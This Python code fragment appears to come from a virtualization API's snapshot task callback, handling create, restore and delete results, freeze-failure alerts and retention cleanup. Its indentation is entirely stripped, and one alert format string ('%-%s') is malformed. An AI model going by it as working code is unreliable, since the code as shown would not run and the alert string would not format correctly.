if (result['returncode'] == 0):
if msg:
try:
result['detail'] = _vm_snapshot_cb_detail(json.loads(msg))
except Exception:
result['detail'] = ('msg=' + to_string(msg))
else:
result['detail'] = ''
if (action == 'POST'):
assert (vm == snap.vm)
snap.status = snap.OK
result['message'] = 'Snapshot successfully created'
if snap.fsfreeze:
if ('freeze failed' in msg):
snap.fsfreeze = False
result['message'] += ' (filesystem freeze failed)'
MonitoringBackend.vm_send_alert(vm, ('Snapshot %s of server %-%s was created, but filesystem freeze failed.' % (snap.name, vm.hostname, snap.array_disk_id)), priority=MonitoringBackend.WARNING)
snap.save(update_fields=('status', 'fsfreeze'))
if (snap.define and snap.define.retention):
assert (vm == snap.define.vm)
assert (snap.disk_id == snap.define.disk_id)
from api.vm.snapshot.views import vm_snapshot_list
_delete_oldest(Snapshot, snap.define, vm_snapshot_list, 'snapnames', task_id, LOG_SNAPS_DELETE)
elif (action == 'PUT'):
if (vm != snap.vm):
snap.vm.revert_notready()
vm.revert_notready()
snap.status = snap.OK
snap.save_status()
if result['meta']['apiview']['force']:
if (snap.vm == vm):
Snapshot.objects.filter(vm=vm, disk_id=snap.disk_id, id__gt=snap.id).delete()
else:
disk = vm.json_active_get_disks()[(result['meta']['apiview']['target_disk_id'] - 1)]
real_disk_id = Snapshot.get_real_disk_id(disk)
Snapshot.objects.filter(vm=vm, disk_id=real_disk_id).delete()
result['message'] = 'Snapshot successfully restored'
elif (action == 'DELETE'):
assert (vm == snap.vm)
snap.delete()
result['message'] = 'Snapshot successfully deleted'
else:
_vm_snapshot_cb_failed(result, task_id, snap, action, vm=vm)
logger.error('Found nonzero returncode in result from %s vm_snapshot(%s, %s). Error: %s', action, vm_uuid, snap, msg)
raise TaskException(result, ('Got bad return code (%s). Error: %s' % (result['returncode'], msg)), snap=snap)
task_log_cb_success(result, task_id, vm=vm, **result['meta'])
return result |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.